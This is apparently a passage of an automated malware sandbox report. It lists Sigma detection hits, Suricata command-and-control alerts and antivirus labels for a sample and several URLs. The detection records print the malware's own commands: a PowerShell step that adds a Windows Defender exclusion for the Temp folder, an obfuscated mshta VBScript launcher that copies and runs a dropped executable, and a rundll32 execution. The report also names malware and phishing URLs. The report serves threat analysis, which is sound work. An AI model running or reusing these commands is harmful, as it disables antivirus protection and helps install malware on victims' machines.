                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7760, ProcessName: powershell.exe
                  Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: control .\R6f7sE.I, ParentImage: C:\Windows\SysWOW64\control.exe, ParentProcessId: 1196, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I, ProcessId: 7852, ProcessName: rundll32.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe, ParentProcessId: 7700, ParentProcessName: setup_install.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7752, ProcessName: cmd.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5448, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU" , ProcessId: 2316, ProcessName: cmd.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: Mon17e1fac3fd3d84b.exe, ParentImage: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe, ParentProcessId: 7956, ParentProcessName: Mon17e1fac3fd3d84b.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) ), ProcessId: 5448, ProcessName: mshta.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp", ProcessId: 7760, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7596, ProcessName: svchost.exe
                  Timestamp:2024-08-21T10:57:16.929515+0200
                  SID:2803305
                  Severity:3
                  Source Port:59942
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:33.745707+0200
                  SID:2803305
                  Severity:3
                  Source Port:60050
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:41.398811+0200
                  SID:2803305
                  Severity:3
                  Source Port:60100
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:18.602448+0200
                  SID:2850107
                  Severity:1
                  Source Port:60036
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:18.602448+0200
                  SID:2850938
                  Severity:1
                  Source Port:60036
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:30.595516+0200
                  SID:2803305
                  Severity:3
                  Source Port:60004
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:11.667367+0200
                  SID:2850107
                  Severity:1
                  Source Port:60076
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:11.667367+0200
                  SID:2850938
                  Severity:1
                  Source Port:60076
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:26.633655+0200
                  SID:2850107
                  Severity:1
                  Source Port:60043
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:26.633655+0200
                  SID:2850938
                  Severity:1
                  Source Port:60043
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:33.894339+0200
                  SID:2803305
                  Severity:3
                  Source Port:59969
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:07.577839+0200
                  SID:2803305
                  Severity:3
                  Source Port:60075
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:01.948773+0200
                  SID:2803305
                  Severity:3
                  Source Port:60071
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:45.127471+0200
                  SID:2803305
                  Severity:3
                  Source Port:59975
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:41.569507+0200
                  SID:2850107
                  Severity:1
                  Source Port:60097
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:41.569507+0200
                  SID:2850938
                  Severity:1
                  Source Port:60097
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:24.456510+0200
                  SID:2803305
                  Severity:3
                  Source Port:60087
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:18.862793+0200
                  SID:2803305
                  Severity:3
                  Source Port:60083
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:32.305962+0200
                  SID:2850107
                  Severity:1
                  Source Port:60091
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:32.305962+0200
                  SID:2850938
                  Severity:1
                  Source Port:60091
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:16.527142+0200
                  SID:2803305
                  Severity:3
                  Source Port:59940
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:50.306446+0200
                  SID:2850107
                  Severity:1
                  Source Port:60015
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:50.306446+0200
                  SID:2850938
                  Severity:1
                  Source Port:60015
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:02.352307+0200
                  SID:2850107
                  Severity:1
                  Source Port:60024
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:02.352307+0200
                  SID:2850938
                  Severity:1
                  Source Port:60024
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:28.129049+0200
                  SID:2803305
                  Severity:3
                  Source Port:60046
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:52.783806+0200
                  SID:2850107
                  Severity:1
                  Source Port:59968
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:52.783806+0200
                  SID:2850938
                  Severity:1
                  Source Port:59968
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:03.226772+0200
                  SID:2850107
                  Severity:1
                  Source Port:60118
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:03.226772+0200
                  SID:2850938
                  Severity:1
                  Source Port:60118
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:07.797527+0200
                  SID:2803305
                  Severity:3
                  Source Port:59991
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:39.386329+0200
                  SID:2803305
                  Severity:3
                  Source Port:60054
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:50.318003+0200
                  SID:2039103
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:50.318003+0200
                  SID:2847712
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:57:50.318003+0200
                  SID:2850316
                  Severity:1
                  Source Port:59977
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:58.337526+0200
                  SID:2850107
                  Severity:1
                  Source Port:60022
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:58.337526+0200
                  SID:2850938
                  Severity:1
                  Source Port:60022
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:01:05.881179+0200
                  SID:2850107
                  Severity:1
                  Source Port:60115
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:01:05.881179+0200
                  SID:2850938
                  Severity:1
                  Source Port:60115
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:02.177324+0200
                  SID:2803305
                  Severity:3
                  Source Port:59988
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:57:39.501144+0200
                  SID:2803305
                  Severity:3
                  Source Port:59972
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:47.184475+0200
                  SID:2803305
                  Severity:3
                  Source Port:60104
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:58.477405+0200
                  SID:2803305
                  Severity:3
                  Source Port:60112
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:49.650539+0200
                  SID:2850107
                  Severity:1
                  Source Port:60103
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:49.650539+0200
                  SID:2850938
                  Severity:1
                  Source Port:60103
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:34.229229+0200
                  SID:2850107
                  Severity:1
                  Source Port:60002
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:34.229229+0200
                  SID:2850938
                  Severity:1
                  Source Port:60002
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:24.275254+0200
                  SID:2850107
                  Severity:1
                  Source Port:60085
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:24.275254+0200
                  SID:2850938
                  Severity:1
                  Source Port:60085
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:55.253881+0200
                  SID:2850107
                  Severity:1
                  Source Port:60063
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:55.253881+0200
                  SID:2850938
                  Severity:1
                  Source Port:60063
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:22.484880+0200
                  SID:2803305
                  Severity:3
                  Source Port:60041
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:42.262286+0200
                  SID:2850107
                  Severity:1
                  Source Port:60010
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:42.262286+0200
                  SID:2850938
                  Severity:1
                  Source Port:60010
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:56.540566+0200
                  SID:2803305
                  Severity:3
                  Source Port:59983
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:00:45.634104+0200
                  SID:2850107
                  Severity:1
                  Source Port:60101
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:45.634104+0200
                  SID:2850938
                  Severity:1
                  Source Port:60101
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:14.587628+0200
                  SID:2850107
                  Severity:1
                  Source Port:60033
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:14.587628+0200
                  SID:2850938
                  Severity:1
                  Source Port:60033
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:35.024805+0200
                  SID:2850107
                  Severity:1
                  Source Port:60048
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:35.024805+0200
                  SID:2850938
                  Severity:1
                  Source Port:60048
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:30.660918+0200
                  SID:2850107
                  Severity:1
                  Source Port:60045
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:30.660918+0200
                  SID:2850938
                  Severity:1
                  Source Port:60045
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:13.448105+0200
                  SID:2803305
                  Severity:3
                  Source Port:59994
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:59.336871+0200
                  SID:2850107
                  Severity:1
                  Source Port:60066
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:59.336871+0200
                  SID:2850938
                  Severity:1
                  Source Port:60066
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:53.666394+0200
                  SID:2850107
                  Severity:1
                  Source Port:60106
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:53.666394+0200
                  SID:2850938
                  Severity:1
                  Source Port:60106
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:14.158762+0200
                  SID:2850107
                  Severity:1
                  Source Port:59980
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:14.158762+0200
                  SID:2850938
                  Severity:1
                  Source Port:59980
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:57.690084+0200
                  SID:2850107
                  Severity:1
                  Source Port:60110
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:57.690084+0200
                  SID:2850938
                  Severity:1
                  Source Port:60110
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:43.196401+0200
                  SID:2850107
                  Severity:1
                  Source Port:60055
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:43.196401+0200
                  SID:2850938
                  Severity:1
                  Source Port:60055
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:22.594371+0200
                  SID:2803305
                  Severity:3
                  Source Port:59953
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:58:24.786762+0200
                  SID:2803305
                  Severity:3
                  Source Port:60000
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T11:01:01.853398+0200
                  SID:2850107
                  Severity:1
                  Source Port:60113
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:01:01.853398+0200
                  SID:2850938
                  Severity:1
                  Source Port:60113
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:58:46.290141+0200
                  SID:2850107
                  Severity:1
                  Source Port:60013
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:58:46.290141+0200
                  SID:2850938
                  Severity:1
                  Source Port:60013
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:59:47.213152+0200
                  SID:2850107
                  Severity:1
                  Source Port:60057
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:47.213152+0200
                  SID:2850938
                  Severity:1
                  Source Port:60057
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T10:57:50.895226+0200
                  SID:2803305
                  Severity:3
                  Source Port:59978
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:56.302056+0200
                  SID:2803305
                  Severity:3
                  Source Port:60067
                  Destination Port:443
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-08-21T10:59:06.398217+0200
                  SID:2850107
                  Severity:1
                  Source Port:60027
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T10:59:06.398217+0200
                  SID:2850938
                  Severity:1
                  Source Port:60027
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:37.305394+0200
                  SID:2850107
                  Severity:1
                  Source Port:60093
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:37.305394+0200
                  SID:2850938
                  Severity:1
                  Source Port:60093
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:19.697545+0200
                  SID:2850107
                  Severity:1
                  Source Port:60082
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:19.697545+0200
                  SID:2850938
                  Severity:1
                  Source Port:60082
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:07.649429+0200
                  SID:2850107
                  Severity:1
                  Source Port:60073
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:07.649429+0200
                  SID:2850938
                  Severity:1
                  Source Port:60073
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-08-21T11:00:03.490004+0200
                  SID:2850107
                  Severity:1
                  Source Port:60070
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-08-21T11:00:03.490004+0200
                  SID:2850938
                  Severity:1
                  Source Port:60070
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp                       | SID     | Severity | Source Port | Destination Port | Protocol | Classtype
                  2024-08-21T10:58:26.213014+0200 | 2850107 | 1        | 59995       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:58:26.213014+0200 | 2850938 | 1        | 59995       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T10:59:22.618763+0200 | 2850107 | 1        | 60040       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:59:22.618763+0200 | 2850938 | 1        | 60040       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T10:59:39.132181+0200 | 2850107 | 1        | 60052       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:59:39.132181+0200 | 2850938 | 1        | 60052       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T10:59:10.430870+0200 | 2850107 | 1        | 60031       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:59:10.430870+0200 | 2850938 | 1        | 60031       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T11:00:15.696828+0200 | 2850107 | 1        | 60078       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T11:00:15.696828+0200 | 2850938 | 1        | 60078       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T11:00:35.757223+0200 | 2803305 | 3        | 60096       | 443              | TCP      | Unknown Traffic
                  2024-08-21T10:58:38.243341+0200 | 2850107 | 1        | 60006       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:58:38.243341+0200 | 2850938 | 1        | 60006       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T10:57:50.877231+0200 | 2039103 | 1        | 59977       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T10:57:50.877231+0200 | 2847712 | 1        | 59977       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:57:50.877231+0200 | 2850316 | 1        | 59977       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:59:50.692749+0200 | 2803305 | 3        | 60062       | 443              | TCP      | Unknown Traffic
                  2024-08-21T10:58:54.322701+0200 | 2850107 | 1        | 60018       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:58:54.322701+0200 | 2850938 | 1        | 60018       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T11:00:28.289954+0200 | 2850107 | 1        | 60088       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T11:00:28.289954+0200 | 2850938 | 1        | 60088       | 80               | TCP      | A Network Trojan was detected
                  2024-08-21T10:59:45.053323+0200 | 2803305 | 3        | 60058       | 443              | TCP      | Unknown Traffic
                  2024-08-21T10:59:51.243221+0200 | 2850107 | 1        | 60061       | 80               | TCP      | Malware Command and Control Activity Detected
                  2024-08-21T10:59:51.243221+0200 | 2850938 | 1        | 60061       | 80               | TCP      | A Network Trojan was detected


                  AV Detection

                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Avira: detected
                  Source: http://lecanardstsornin.com/upload/ | Avira URL Cloud: Label: malware
                  Source: https://t.gogamec.com/os | Avira URL Cloud: Label: phishing
                  Source: https://t.gogamec.com/ps | Avira URL Cloud: Label: malware
